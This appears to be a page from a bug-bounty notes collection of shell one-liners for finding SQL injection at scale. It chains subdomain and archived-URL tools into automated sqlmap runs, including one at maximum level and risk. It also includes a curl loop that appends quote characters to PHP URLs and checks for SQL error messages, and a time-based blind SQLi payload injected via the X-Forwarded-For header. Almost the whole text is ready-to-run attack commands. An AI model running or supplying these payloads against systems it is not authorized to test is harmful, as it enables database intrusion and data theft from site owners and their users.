One-liners

Collection of one-liners, inspired by bug bounties

#SQLi
#presupposes other tools, including uro, waybackurls, dnsx and httpx-toolkit

cat targets.txt | dnsx | waybackurls | uro | grep "\?" | head -20 | httpx-toolkit -silent > urls.txt;sqlmap -m urls.txt --batch --random-agent --level 1 | tee sqlmap.txt

#SQLi php tester
#Run against cariddi/katana output, grepping for .php extensions

cat cariddi_vanilla.txt | grep ".php" | sed 's/\.php.*/.php\//' | sort -u | sed s/$/%27%22%60/ | while read url do ; do curl --silent "$url" | grep -qs "You have an error in your SQL syntax" && echo -e "$url \e[1;32mSQLI by R3dcl1ff\e[0m" || echo -e "$url \e[1;31mNot Vulnerable to SQLI Injection\e[0m" ;done

#SQLi Header-Based Blind SQL injection
cat domain.txt | httpx -silent -H "X-Forwarded-For: 'XOR(if(now()=sysdate(),sleep(13),0))OR" -rt -timeout 20 -mrt '>13'

cat subs.txt | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli -batch --random-agent --level 5 --risk 3

PreviousSqlMap NextCVEs

Last updated 3 months ago